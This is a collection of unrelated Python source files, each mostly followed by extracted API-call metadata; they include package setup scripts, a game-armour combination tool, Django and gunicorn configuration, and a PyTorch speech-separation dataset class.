'numpy.absolute', 'numpy.absolute', (['all_saliency_values'], {}), '(all_saliency_values)\n', 
(6141, 6162), False, 'import numpy\n'), ((6354, 6751), 'ml4tc.plotting.satellite_plotting.plot_saliency', 'satellite_plotting.plot_saliency', ([], {'saliency_matrix': 'saliency_matrices[0][0, ..., k, 0]', 'axes_object': 'axes_objects[k]', 'latitude_array_deg_n': 'grid_latitude_matrix_deg_n[:, k]', 'longitude_array_deg_e': 'grid_longitude_matrix_deg_e[:, k]', 'min_abs_contour_value': 'min_abs_contour_value', 'max_abs_contour_value': 'max_abs_contour_value', 'half_num_contours': '(10)', 'colour_map_object': 'colour_map_object'}), '(saliency_matrix=saliency_matrices[0][0,\n ..., k, 0], axes_object=axes_objects[k], latitude_array_deg_n=\n grid_latitude_matrix_deg_n[:, k], longitude_array_deg_e=\n grid_longitude_matrix_deg_e[:, k], min_abs_contour_value=\n min_abs_contour_value, max_abs_contour_value=max_abs_contour_value,\n half_num_contours=10, colour_map_object=colour_map_object)\n', (6386, 6751), False, 'from ml4tc.plotting import satellite_plotting\n'), ((7263, 7294), 'matplotlib.pyplot.close', 'pyplot.close', (['figure_objects[k]'], {}), '(figure_objects[k])\n', (7275, 7294), False, 'from matplotlib import pyplot\n'), ((7304, 7447), 'gewittergefahr.plotting.imagemagick_utils.resize_image', 'imagemagick_utils.resize_image', ([], {'input_file_name': 'panel_file_names[k]', 'output_file_name': 'panel_file_names[k]', 'output_size_pixels': 'PANEL_SIZE_PX'}), '(input_file_name=panel_file_names[k],\n output_file_name=panel_file_names[k], output_size_pixels=PANEL_SIZE_PX)\n', (7334, 7447), False, 'from gewittergefahr.plotting import imagemagick_utils\n'), ((3915, 3943), 'numpy.expand_dims', 'numpy.expand_dims', (['p'], {'axis': '(0)'}), '(p, axis=0)\n', (3932, 3943), False, 'import numpy\n'), ((4207, 4235), 'numpy.expand_dims', 'numpy.expand_dims', (['p'], {'axis': '(0)'}), '(p, axis=0)\n', (4224, 4235), False, 'import numpy\n'), ((5529, 5548), 'numpy.array', 'numpy.array', (['[20.0]'], {}), '([20.0])\n', (5540, 5548), False, 'import numpy\n'), ((5585, 5605), 
'numpy.array', 'numpy.array', (['[330.0]'], {}), '([330.0])\n', (5596, 5605), False, 'import numpy\n'), ((5881, 5895), 'numpy.ravel', 'numpy.ravel', (['s'], {}), '(s)\n', (5892, 5895), False, 'import numpy\n'), ((10273, 10417), 'gewittergefahr.gg_utils.general_utils.apply_gaussian_filter', 'gg_general_utils.apply_gaussian_filter', ([], {'input_matrix': 'saliency_dict[this_key][0][..., k, 0]', 'e_folding_radius_grid_cells': 'smoothing_radius_px'}), '(input_matrix=saliency_dict[this_key]\n [0][..., k, 0], e_folding_radius_grid_cells=smoothing_radius_px)\n', (10311, 10417), True, 'from gewittergefahr.gg_utils import general_utils as gg_general_utils\n')] |
""" Setup file """
import os
from setuptools import setup, find_packages
HERE = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(HERE, "README.rst")).read()
CHANGES = open(os.path.join(HERE, "CHANGES.rst")).read()
REQUIREMENTS = [
"dynamo3>=0.4.7",
"future>=0.15.0",
"pyparsing==2.1.4",
"python-dateutil<2.7.0",
]
EXTRAS = {
"test": ["nose", "mock"],
"lint": ["black", "pylint==2.3.1"],
"doc": ["numpydoc", "sphinx", "sphinx_rtd_theme"],
}
if __name__ == "__main__":
setup(
name="dql",
version="0.5.26",
description="DynamoDB Query Language",
long_description=README + "\n\n" + CHANGES,
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
author="<NAME>",
author_email="<EMAIL>",
url="http://github.com/stevearc/dql",
keywords="aws dynamo dynamodb sql",
license="MIT",
platforms="any",
include_package_data=True,
packages=find_packages(exclude=("tests",)),
entry_points={"console_scripts": ["dql = dql:main"]},
install_requires=REQUIREMENTS,
tests_require=REQUIREMENTS + EXTRAS["test"],
extras_require=EXTRAS,
)
| [
"os.path.dirname",
"setuptools.find_packages",
"os.path.join"
] | [((99, 124), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (114, 124), False, 'import os\n'), ((140, 172), 'os.path.join', 'os.path.join', (['HERE', '"""README.rst"""'], {}), "(HERE, 'README.rst')\n", (152, 172), False, 'import os\n'), ((196, 229), 'os.path.join', 'os.path.join', (['HERE', '"""CHANGES.rst"""'], {}), "(HERE, 'CHANGES.rst')\n", (208, 229), False, 'import os\n'), ((1515, 1548), 'setuptools.find_packages', 'find_packages', ([], {'exclude': "('tests',)"}), "(exclude=('tests',))\n", (1528, 1548), False, 'from setuptools import setup, find_packages\n')] |
import multiprocessing
import csv_exporter
from combination.brute_force_combination_algorithm import \
BruteForceCombinationAlgorithm
from combination.combiner import Combiner
from combination.constrained_combination_algorithm import \
ConstrainedCombinationAlgorithm
from config.config_importer import ConfigImporter
from equipment.equipment_piece import BodyPart
from mhw_db_loaders.armour_loader import ArmourLoader
from mhw_db_loaders.armour_set_loader import ArmourSetLoader
from mhw_db_loaders.armour_set_skill_loader import ArmourSetSkillLoader
from mhw_db_loaders.charm_loader import CharmLoader
from mhw_db_loaders.data_loader import load_json
from mhw_db_loaders.skill_loader import SkillLoader
from scorer import Scorer
def count_armour_pieces(body_part, armour_pieces) -> int:
    """Return how many pieces in ``armour_pieces`` cover ``body_part``.

    Counts with a generator expression instead of materializing an
    intermediate list just to take its length.
    """
    return sum(1 for piece in armour_pieces if piece.body_part == body_part)
def run(
    config_location: str,
    skills_location: str,
    armour_sets_location: str,
    armour_location: str,
    charms_location: str,
    export_location: str
):
    """Load all game data, generate scored equipment combinations and
    export them as CSV to ``export_location``."""
    # Skill metadata feeds every other loader, so resolve it first.
    loaded_skills = SkillLoader(load_json(skills_location)).load()
    skills = loaded_skills.by_id()
    skills_by_name = loaded_skills.by_name()
    skill_ranks = loaded_skills.skill_ranks_by_id()
    config = ConfigImporter(config_location, skills_by_name).load()
    print("Successfully loaded config.")
    armour_sets = ArmourSetLoader(load_json(armour_sets_location)).load()
    armour_set_skills = ArmourSetSkillLoader(
        armour_sets, skills, skill_ranks
    ).load()
    armour_pieces = ArmourLoader(
        config, armour_sets, skill_ranks, load_json(armour_location)
    ).load()
    charms = CharmLoader(config, skill_ranks, load_json(charms_location)).load()
    print(
        "Loaded {} equipment pieces {{\n"
        "    head:   {}\n"
        "    chest:  {}\n"
        "    gloves: {}\n"
        "    waist:  {}\n"
        "    legs:   {}\n"
        "    charms: {}\n"
        "}}".format(
            len(armour_pieces),
            count_armour_pieces(BodyPart.HEAD, armour_pieces),
            count_armour_pieces(BodyPart.CHEST, armour_pieces),
            count_armour_pieces(BodyPart.GLOVES, armour_pieces),
            count_armour_pieces(BodyPart.WAIST, armour_pieces),
            count_armour_pieces(BodyPart.LEGS, armour_pieces),
            len(charms)
        )
    )
    # Bucket every piece (armour and charms alike) by the slot it occupies;
    # every BodyPart gets a key even when nothing matches it.
    equipment_by_body_part = {slot: [] for slot in BodyPart}
    for item in armour_pieces + charms:
        equipment_by_body_part[item.body_part].append(item)
    # Reserve one CPU for the progress bar, if possible.
    worker_count = max(multiprocessing.cpu_count() - 1, 1)
    combinations = Combiner(
        equipment_by_body_part,
        [
            BruteForceCombinationAlgorithm(worker_count, config.result_limit),
            ConstrainedCombinationAlgorithm(
                config.skill_config,
                skills_by_name,
                armour_set_skills,
                config.result_limit
            )
        ],
        Scorer(config, skills_by_name, skill_ranks),
        worker_count
    ).generate_combinations(config)
    csv_exporter.export_combinations(combinations, skill_ranks, export_location)
| [
"mhw_db_loaders.data_loader.load_json",
"combination.constrained_combination_algorithm.ConstrainedCombinationAlgorithm",
"config.config_importer.ConfigImporter",
"multiprocessing.cpu_count",
"csv_exporter.export_combinations",
"scorer.Scorer",
"combination.brute_force_combination_algorithm.BruteForceCom... | [((3291, 3367), 'csv_exporter.export_combinations', 'csv_exporter.export_combinations', (['combinations', 'skill_ranks', 'export_location'], {}), '(combinations, skill_ranks, export_location)\n', (3323, 3367), False, 'import csv_exporter\n'), ((1329, 1376), 'config.config_importer.ConfigImporter', 'ConfigImporter', (['config_location', 'skills_by_name'], {}), '(config_location, skills_by_name)\n', (1343, 1376), False, 'from config.config_importer import ConfigImporter\n'), ((1523, 1577), 'mhw_db_loaders.armour_set_skill_loader.ArmourSetSkillLoader', 'ArmourSetSkillLoader', (['armour_sets', 'skills', 'skill_ranks'], {}), '(armour_sets, skills, skill_ranks)\n', (1543, 1577), False, 'from mhw_db_loaders.armour_set_skill_loader import ArmourSetSkillLoader\n'), ((2728, 2755), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (2753, 2755), False, 'import multiprocessing\n'), ((1149, 1175), 'mhw_db_loaders.data_loader.load_json', 'load_json', (['skills_location'], {}), '(skills_location)\n', (1158, 1175), False, 'from mhw_db_loaders.data_loader import load_json\n'), ((1459, 1490), 'mhw_db_loaders.data_loader.load_json', 'load_json', (['armour_sets_location'], {}), '(armour_sets_location)\n', (1468, 1490), False, 'from mhw_db_loaders.data_loader import load_json\n'), ((1715, 1741), 'mhw_db_loaders.data_loader.load_json', 'load_json', (['armour_location'], {}), '(armour_location)\n', (1724, 1741), False, 'from mhw_db_loaders.data_loader import load_json\n'), ((1801, 1827), 'mhw_db_loaders.data_loader.load_json', 'load_json', (['charms_location'], {}), '(charms_location)\n', (1810, 1827), False, 'from mhw_db_loaders.data_loader import load_json\n'), ((3181, 3224), 'scorer.Scorer', 'Scorer', (['config', 'skills_by_name', 'skill_ranks'], {}), '(config, skills_by_name, skill_ranks)\n', (3187, 3224), False, 'from scorer import Scorer\n'), ((2847, 2915), 
'combination.brute_force_combination_algorithm.BruteForceCombinationAlgorithm', 'BruteForceCombinationAlgorithm', (['num_worker_cpus', 'config.result_limit'], {}), '(num_worker_cpus, config.result_limit)\n', (2877, 2915), False, 'from combination.brute_force_combination_algorithm import BruteForceCombinationAlgorithm\n'), ((2975, 3087), 'combination.constrained_combination_algorithm.ConstrainedCombinationAlgorithm', 'ConstrainedCombinationAlgorithm', (['config.skill_config', 'skills_by_name', 'armour_set_skills', 'config.result_limit'], {}), '(config.skill_config, skills_by_name,\n armour_set_skills, config.result_limit)\n', (3006, 3087), False, 'from combination.constrained_combination_algorithm import ConstrainedCombinationAlgorithm\n')] |
from setuptools import setup

import src

# Guard the setup() call so merely importing this module has no side
# effects; setuptools/pip still execute setup.py as __main__, and this
# matches the conventional setup.py layout.
if __name__ == '__main__':
    setup(name='lsankidb',
          version=src.__version__,
          install_requires=['AnkiTools'],
          description='"ls" for your local Anki database.',
          #FIXME this duplicates README.md
          long_description="""
.. image:: https://cdn.jsdelivr.net/gh/AurelienLourot/lsankidb@c9735756451d135f94601b816469128e0cdadba2/thirdparty/logo.png
   :height: 64px
   :width: 64px
   :align: right
lsankidb
========
``ls`` for your local `Anki <https://apps.ankiweb.net/>`__ database.
Dump all your Anki terms in order to save them, search them, ``grep`` them or ``diff`` them.
::
    $ lsankidb
    Listing /home/me/.local/share/Anki2/User 1/collection.anki2 ...
    Default
    French
        ['Hello', 'Bonjour']
        ['How are you?', 'Comment ça va ?']
    German
        ['Hello', 'Hallo']
        ['How are you?', "Wie geht's?"]
`See on GitHub. <https://github.com/AurelienLourot/lsankidb>`__
""",
          keywords=['anki',
                    'terminal',
                    'cli',
                    'dump',
                    'ls',],
          author='<NAME>',
          author_email='<EMAIL>',
          url='https://github.com/AurelienLourot/lsankidb',
          download_url='https://github.com/AurelienLourot/lsankidb/tarball/'
                       + src.__version__,
          license='public domain',
          classifiers=['Development Status :: 4 - Beta',
                       'Environment :: Console',
                       'Intended Audience :: Developers',
                       'License :: Public Domain',
                       'Natural Language :: English',
                       'Operating System :: POSIX :: Linux',
                       'Programming Language :: Python :: 3.5',
                       'Programming Language :: Python :: 3.6',
                       'Topic :: Education',
                       'Topic :: Utilities'],
          packages=['src'],
          entry_points="""
      [console_scripts]
      lsankidb = src.lsankidb:main
      """)
| [
"setuptools.setup"
] | [((41, 1624), 'setuptools.setup', 'setup', ([], {'name': '"""lsankidb"""', 'version': 'src.__version__', 'install_requires': "['AnkiTools']", 'description': '""""ls" for your local Anki database."""', 'long_description': '"""\n.. image:: https://cdn.jsdelivr.net/gh/AurelienLourot/lsankidb@c9735756451d135f94601b816469128e0cdadba2/thirdparty/logo.png\n :height: 64px\n :width: 64px\n :align: right\n\nlsankidb\n========\n\n``ls`` for your local `Anki <https://apps.ankiweb.net/>`__ database.\n\nDump all your Anki terms in order to save them, search them, ``grep`` them or ``diff`` them.\n\n::\n\n $ lsankidb\n Listing /home/me/.local/share/Anki2/User 1/collection.anki2 ...\n \n Default\n French\n [\'Hello\', \'Bonjour\']\n [\'How are you?\', \'Comment ça va ?\']\n German\n [\'Hello\', \'Hallo\']\n [\'How are you?\', "Wie geht\'s?"]\n\n`See on GitHub. <https://github.com/AurelienLourot/lsankidb>`__\n"""', 'keywords': "['anki', 'terminal', 'cli', 'dump', 'ls']", 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://github.com/AurelienLourot/lsankidb"""', 'download_url': "('https://github.com/AurelienLourot/lsankidb/tarball/' + src.__version__)", 'license': '"""public domain"""', 'classifiers': "['Development Status :: 4 - Beta', 'Environment :: Console',\n 'Intended Audience :: Developers', 'License :: Public Domain',\n 'Natural Language :: English', 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6', 'Topic :: Education',\n 'Topic :: Utilities']", 'packages': "['src']", 'entry_points': '"""\n[console_scripts]\nlsankidb = src.lsankidb:main\n"""'}), '(name=\'lsankidb\', version=src.__version__, install_requires=[\n \'AnkiTools\'], description=\'"ls" for your local Anki database.\',\n long_description=\n """\n.. 
image:: https://cdn.jsdelivr.net/gh/AurelienLourot/lsankidb@c9735756451d135f94601b816469128e0cdadba2/thirdparty/logo.png\n :height: 64px\n :width: 64px\n :align: right\n\nlsankidb\n========\n\n``ls`` for your local `Anki <https://apps.ankiweb.net/>`__ database.\n\nDump all your Anki terms in order to save them, search them, ``grep`` them or ``diff`` them.\n\n::\n\n $ lsankidb\n Listing /home/me/.local/share/Anki2/User 1/collection.anki2 ...\n \n Default\n French\n [\'Hello\', \'Bonjour\']\n [\'How are you?\', \'Comment ça va ?\']\n German\n [\'Hello\', \'Hallo\']\n [\'How are you?\', "Wie geht\'s?"]\n\n`See on GitHub. <https://github.com/AurelienLourot/lsankidb>`__\n"""\n , keywords=[\'anki\', \'terminal\', \'cli\', \'dump\', \'ls\'], author=\'<NAME>\',\n author_email=\'<EMAIL>\', url=\n \'https://github.com/AurelienLourot/lsankidb\', download_url=\n \'https://github.com/AurelienLourot/lsankidb/tarball/\' + src.__version__,\n license=\'public domain\', classifiers=[\'Development Status :: 4 - Beta\',\n \'Environment :: Console\', \'Intended Audience :: Developers\',\n \'License :: Public Domain\', \'Natural Language :: English\',\n \'Operating System :: POSIX :: Linux\',\n \'Programming Language :: Python :: 3.5\',\n \'Programming Language :: Python :: 3.6\', \'Topic :: Education\',\n \'Topic :: Utilities\'], packages=[\'src\'], entry_points=\n """\n[console_scripts]\nlsankidb = src.lsankidb:main\n""")\n', (46, 1624), False, 'from setuptools import setup\n')] |
import logging
from injector import inject, singleton
from starlette.config import Config
from common.database import BaseDatabase
LOGGER = logging.getLogger(__name__)
@singleton
@inject
class MasterDatabase(BaseDatabase):
    """Singleton handle on the writable (master) database connection."""

    def __init__(self, config: Config) -> None:
        super().__init__(config)
        # Resolve the DSN from configuration once at construction time;
        # test_connection() comes from BaseDatabase.
        self.__url: str = config('MASTER_DATABASE_URL', str)
        LOGGER.debug('Master Session Maker Initialized')
        self.test_connection()

    @property
    def get_db_url(self) -> str:
        """Connection string for the master database."""
        return self.__url
@singleton
@inject
class ReplicaDatabase(BaseDatabase):
    """Singleton handle on the read-only (replica) database connection."""

    def __init__(self, config: Config) -> None:
        super().__init__(config)
        # Resolve the DSN from configuration once at construction time;
        # test_connection() comes from BaseDatabase.
        self.__url: str = config('REPLICA_DATABASE_URL', str)
        LOGGER.debug('Replica Session Maker Initialized')
        self.test_connection()

    @property
    def get_db_url(self) -> str:
        """Connection string for the replica database."""
        return self.__url
| [
"logging.getLogger"
] | [((143, 170), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (160, 170), False, 'import logging\n')] |
# python3
"""Testing code to run the typed_ast based pyi parser."""
import sys
from pytype import module_utils
from pytype.pyi import parser
from pytype.pyi.types import ParseError # pylint: disable=g-importing-member
from pytype.pytd import pytd_utils
if __name__ == '__main__':
  # Usage: script.py <pyi file>. Parses the stub and prints the pytd tree
  # plus its round-tripped textual form.
  path = sys.argv[1]
  with open(path, 'r') as pyi_file:
    src = pyi_file.read()
  module_name = module_utils.path_to_module_name(path)
  version = (3, 6)
  try:
    out, _ = parser.parse_pyi_debug(src, path, module_name, version, None)
  except ParseError as e:
    print(e)
    sys.exit(1)
  else:
    print('------pytd--------------')
    print(out)
    print('------round trip--------------')
    print(pytd_utils.Print(out))
| [
"pytype.pytd.pytd_utils.Print",
"sys.exit",
"pytype.pyi.parser.parse_pyi_debug",
"pytype.module_utils.path_to_module_name"
] | [((380, 422), 'pytype.module_utils.path_to_module_name', 'module_utils.path_to_module_name', (['filename'], {}), '(filename)\n', (412, 422), False, 'from pytype import module_utils\n'), ((463, 528), 'pytype.pyi.parser.parse_pyi_debug', 'parser.parse_pyi_debug', (['src', 'filename', 'module_name', 'version', 'None'], {}), '(src, filename, module_name, version, None)\n', (485, 528), False, 'from pytype.pyi import parser\n'), ((694, 715), 'pytype.pytd.pytd_utils.Print', 'pytd_utils.Print', (['out'], {}), '(out)\n', (710, 715), False, 'from pytype.pytd import pytd_utils\n'), ((581, 592), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (589, 592), False, 'import sys\n')] |
from django.contrib import admin
from .models import *
# Register every model with the default admin site so they can be managed
# through Django's admin interface.
for model in (University, Faculty, Subject, Teacher):
    admin.site.register(model)
| [
"django.contrib.admin.site.register"
] | [((57, 88), 'django.contrib.admin.site.register', 'admin.site.register', (['University'], {}), '(University)\n', (76, 88), False, 'from django.contrib import admin\n'), ((89, 117), 'django.contrib.admin.site.register', 'admin.site.register', (['Faculty'], {}), '(Faculty)\n', (108, 117), False, 'from django.contrib import admin\n'), ((118, 146), 'django.contrib.admin.site.register', 'admin.site.register', (['Subject'], {}), '(Subject)\n', (137, 146), False, 'from django.contrib import admin\n'), ((147, 175), 'django.contrib.admin.site.register', 'admin.site.register', (['Teacher'], {}), '(Teacher)\n', (166, 175), False, 'from django.contrib import admin\n')] |
import multiprocessing
import os

# Gunicorn settings, overridable through environment variables.

# Listen address "<HOST>:<PORT>", defaulting to 0.0.0.0:8080.
bind = "{0}:{1}".format(os.environ.get('HOST', '0.0.0.0'), os.environ.get('PORT', '8080'))
# Worker count: the common (2 * CPU cores) + 1 heuristic unless WORKERS is
# set. Cast to int so the setting has a consistent type either way (the
# raw env string previously leaked through whenever WORKERS was set).
workers = int(os.environ.get('WORKERS', multiprocessing.cpu_count() * 2 + 1))
| [
"os.environ.get",
"multiprocessing.cpu_count"
] | [((59, 92), 'os.environ.get', 'os.environ.get', (['"""HOST"""', '"""0.0.0.0"""'], {}), "('HOST', '0.0.0.0')\n", (73, 92), False, 'import os\n'), ((94, 124), 'os.environ.get', 'os.environ.get', (['"""PORT"""', '"""8080"""'], {}), "('PORT', '8080')\n", (108, 124), False, 'import os\n'), ((162, 189), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (187, 189), False, 'import multiprocessing\n')] |
import numpy as np
def import_accuracy(y_test, predictions):
    """Return 100 minus the mean absolute percentage error (MAPE).

    Args:
        y_test: true target values; array-like supporting elementwise
            arithmetic. Division is by the targets, so zero targets yield
            undefined results.
        predictions: predicted values, same shape as ``y_test``.

    Returns:
        Scalar accuracy in percent.
    """
    percentage_errors = np.abs(predictions - y_test) / y_test * 100
    return 100 - np.mean(percentage_errors)
| [
"numpy.mean"
] | [((148, 161), 'numpy.mean', 'np.mean', (['mape'], {}), '(mape)\n', (155, 161), True, 'import numpy as np\n')] |
import numpy as np
import os
import torch
import torch.utils.data as data
import pdb
import pickle
from pathlib import Path
from scipy import signal
import librosa
import scipy
from itertools import permutations
from numpy.linalg import solve
import numpy as np
import soundfile as sf
from convolutive_prediction import Apply_ConvolutivePrediction
class AudioDataset(data.Dataset):
def __init__(self,trainMode, functionMode, num_spks, num_ch, pickle_dir, ref_ch, model,device,cudaUse,check_audio,dereverb_Info,**STFT_args):
super(AudioDataset, self).__init__()
self.trainMode = trainMode
self.functionMode = functionMode
self.model = model
self.fs = STFT_args['fs']
self.window = STFT_args['window']
self.nperseg = STFT_args['length']
self.noverlap = STFT_args['overlap']
self.num_spks = num_spks
self.num_ch = num_ch
self.device = device
self.cudaUse = cudaUse
self.pickle_dir = list(Path(pickle_dir).glob('**/**/**/**/*.pickle'))
hann_win = scipy.signal.get_window('hann', self.nperseg)
self.scale = np.sqrt(1.0 / hann_win.sum()**2)
self.check_audio = check_audio
self.ref_ch = ref_ch
self.dereverb_flag = dereverb_Info[0]
self.predictionType = dereverb_Info[1]
self.tapDelay = dereverb_Info[2]
self.nTap = dereverb_Info[3]
self.reverb_variance_flowValue = dereverb_Info[4]
# self.pickle_dir = self.pickle_dir[0:10]
# # check chunked audio signal
# MAX_INT16 = np.iinfo(np.int16).max
# test= ref2 * MAX_INT16
# test = test.astype(np.int16)
# wf.write('sample_ref2.wav',16000,test)
def STFT(self,time_sig):
'''
input : [T,Nch]
output : [Nch,F,T]
'''
assert time_sig.shape[0] > time_sig.shape[1], "Please check the STFT input dimension, input = [T,Nch] "
num_ch = time_sig.shape[1]
for num_ch in range(num_ch):
# scipy.signal.stft : output : [F range, T range, FxT components]
_,_,stft_ch = signal.stft(time_sig[:,num_ch],fs=self.fs,window=self.window,nperseg=self.nperseg,noverlap=self.noverlap)
# output : [FxT]
stft_ch = np.expand_dims(stft_ch,axis=0)
if num_ch == 0:
stft_chcat = stft_ch
else:
stft_chcat = np.append(stft_chcat,stft_ch,axis=0)
return stft_chcat
def __getitem__(self,index):
with open(self.pickle_dir[index], 'rb') as f:
data_infos = pickle.load(f)
f.close()
mix = data_infos['mix']
mix_stft = self.STFT(mix)
mix_stft = mix_stft/self.scale # scale equality between scipy stft and matlab stft
##################### Todo #########################################################################################################
###################### reference ch로 하도록 mix stft, ref_stft등 circular shift 해야됨.
##############################################################################################################################
assert self.num_spks+1 == len(data_infos), "[ERROR] Check the number of speakers"
ref_stft = [[] for spk_idx in range(self.num_spks)]
for spk_idx in range(self.num_spks):
ref_sig = data_infos['ref'+str(spk_idx+1)]
if len(ref_sig.shape) == 1:
ref_sig = np.expand_dims(ref_sig,axis=1)
ref_stft[spk_idx] = torch.permute(torch.from_numpy(self.STFT(ref_sig)),[0,2,1])
ref_stft[spk_idx] = ref_stft[spk_idx]/self.scale # scale equality between scipy stft and matlab stft
# numpy to torch & reshpae [C,F,T] ->[C,T,F]
mix_stft = torch.permute( torch.from_numpy(mix_stft),[0,2,1])
if self.functionMode == 'Separate':
"""
Output :
mix_stft : [Mic,T,F]
ref_stft : [Mic,T,F]
"""
return torch.roll(mix_stft,-self.ref_ch,dims=0), torch.roll(ref_stft,-self.ref_ch,dims=0)
elif self.functionMode == 'Beamforming':
"""
Output :
mix_stft : [Mic,T,F]
ref_stft : [Mic,T,F]
"""
BeamOutSaveDir = str(self.pickle_dir[index]).replace('CleanMix','Beamforming')
MISO1OutSaveDir = str(self.pickle_dir[index]).replace('CleanMix','MISO1')
return mix_stft, ref_stft, BeamOutSaveDir, MISO1OutSaveDir
elif 'Enhance' in self.functionMode:
"""
Output :
mix_stft : [Mic,T,F]
ref_stft_1ch, list, [Mic,T,F]
MISO1_stft, list, [Mic,T,F]
Beamform_stft, list, [Mic,T,F]
"""
if len(mix_stft.shape)==3:
mix_stft = torch.unsqueeze(mix_stft,dim=0)
if self.cudaUse:
mix_stft = mix_stft.cuda(self.device)
ref_stft_1ch = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
if len(ref_stft[spk_idx].shape) == 3:
ref_stft[spk_idx] = torch.unsqueeze(ref_stft[spk_idx], dim=0)
ref_stft_1ch[spk_idx] = ref_stft[spk_idx][:,self.ref_ch,:,:] # select reference mic channel
ref_stft_1ch[spk_idx] = torch.unsqueeze(ref_stft_1ch[spk_idx], dim=1)
B, Mic, T, F = mix_stft.size()
"""
Apply Source Separation
"""
if self.functionMode == 'Enhance_Load_MISO1_Output' or self.functionMode == 'Enhance_Load_MISO1_MVDR_Output':
MISO1OutSaveDir = str(self.pickle_dir[index]).replace('CleanMix','MISO1')
MISO1_stft = [[] for _ in range(self.num_spks)]
# Load MISO1 Output
for spk_idx in range(self.num_spks):
spk_name = '_s{}.wav'.format(spk_idx+1)
MISO1_sig, fs = librosa.load(MISO1OutSaveDir.replace('.pickle',spk_name), mono= False, sr= 8000)
if MISO1_sig.shape[1] != self.num_ch:
MISO1_sig = MISO1_sig.T
assert fs == self.fs, 'Check sampling rate'
if len(MISO1_sig.shape) == 1:
MISO1_sig = np.expand_dims(MISO1_sig, axis=1)
MISO1_stft[spk_idx] = torch.permute(torch.from_numpy(self.STFT(MISO1_sig)),[0,2,1])
MISO1_stft[spk_idx] = MISO1_stft[spk_idx]/self.scale
# MISO1_spk1 = torch.unsqueeze(MISO1_stft[0],dim=0)
# MISO1_spk2 = torch.unsqueeze(MISO1_stft[1],dim=0)
else:
MISO1_stft = self.MISO1_Inference(mix_stft, ref_ch = self.ref_ch)
if self.cudaUse:
mix_stft = mix_stft.detach().cpu()
for spk_idx in range(self.num_spks):
MISO1_stft[spk_idx] = MISO1_stft[spk_idx].detach().cpu()
"""
Source Alignment between Clean reference signal and MISO1 signal
calculate magnitude distance between ref mic(ch0) and target signal(reference mic : ch0)
"""
for spk_idx in range(self.num_spks):
if spk_idx == 0 :
ref_ = ref_stft_1ch[spk_idx]
s_MISO1 = MISO1_stft[spk_idx][:,0,:,:] # [B,T,F]
else:
ref_ = torch.cat((ref_,ref_stft_1ch[spk_idx]), dim=1)
s_MISO1 = torch.stack((s_MISO1, MISO1_stft[spk_idx][:,0,:,:]), dim=1)
s_MISO1_ = torch.unsqueeze(s_MISO1,dim=2) #[B,Spks,1,T,F]
magnitude_MISO1 = torch.abs(torch.sqrt(s_MISO1_.real**2 + s_MISO1_.imag**2)) #[B,Spks,1,T,F]
s_ref = torch.unsqueeze(ref_, dim=1)
magnitude_distance = torch.sum(torch.abs(magnitude_MISO1 - abs(s_ref)),[3,4])
perms = ref_.new_tensor(list(permutations(range(self.num_spks))), dtype=torch.long) #[[0,1],[1,0]]
index_ = torch.unsqueeze(perms, dim=2)
perms_one_hot = ref_.new_zeros((*perms.size(), self.num_spks), dtype=torch.float).scatter_(2,index_,1)
batchwise_distance = torch.einsum('bij,pij->bp',[magnitude_distance, perms_one_hot])
min_distance_idx = torch.argmin(batchwise_distance, dim=1)
for batch_idx in range(B):
align_index = torch.argmax(perms_one_hot[min_distance_idx[batch_idx]], dim=1)
for spk_idx in range(self.num_spks):
target_index = align_index[spk_idx]
ref_stft_1ch[spk_idx] = torch.unsqueeze(ref_[batch_idx,target_index,...],dim=0)
"""
Apply Dereverberation Method
1. WPE : weighted prediction error
2. ICP : inverse convolutive prediction
3. FCP : forward convolutive prediction
4. cFCP : combine forward convolutive prediction
"""
if self.dereverb_flag :
dereverb_stft = [[] for _ in range(self.num_spks)]
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
if self.predictionType == 'cFCP':
source = [torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy() for spk_idx in range(self.num_spks)]
dereverb_stft = Apply_ConvolutivePrediction(observe,source,self.num_spks,self.predictionType,self.tapDelay,self.nTap,self.reverb_variance_flowValue)
elif self.predictionType == 'test':
source = [torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy() for spk_idx in range(self.num_spks)]
dereverb_stft = Apply_ConvolutivePrediction(observe,source,self.num_spks,self.predictionType,self.tapDelay,self.nTap,self.reverb_variance_flowValue)
else:
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
dereverb_stft[spk_idx] = Apply_ConvolutivePrediction(observe,source,self.num_spks,self.predictionType,self.tapDelay,self.nTap,self.reverb_variance_flowValue)
#################################
########### Testcode ###########
#################################
# WPE
DNN_WPE_dereverb_stft = [[] for _ in range(self.num_spks)]
FCP_dereverb_stft = [[] for _ in range(self.num_spks)]
for spk_idx in range(self.num_spks):
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
DNN_WPE_dereverb_stft[spk_idx] = Apply_ConvolutivePrediction(observe,source,self.num_spks,'DNN_WPE',self.tapDelay,self.nTap,self.reverb_variance_flowValue)
# FCP
source = torch.permute(MISO1_stft[spk_idx],[0,3,1,2]).numpy()
observe = torch.permute(mix_stft,[0,3,1,2]).detach().cpu().numpy()
FCP_dereverb_stft[spk_idx] = Apply_ConvolutivePrediction(observe,source,self.num_spks,'FCP',self.tapDelay,self.nTap,self.reverb_variance_flowValue)
#################################
########### Testcode ###########
#################################
"""
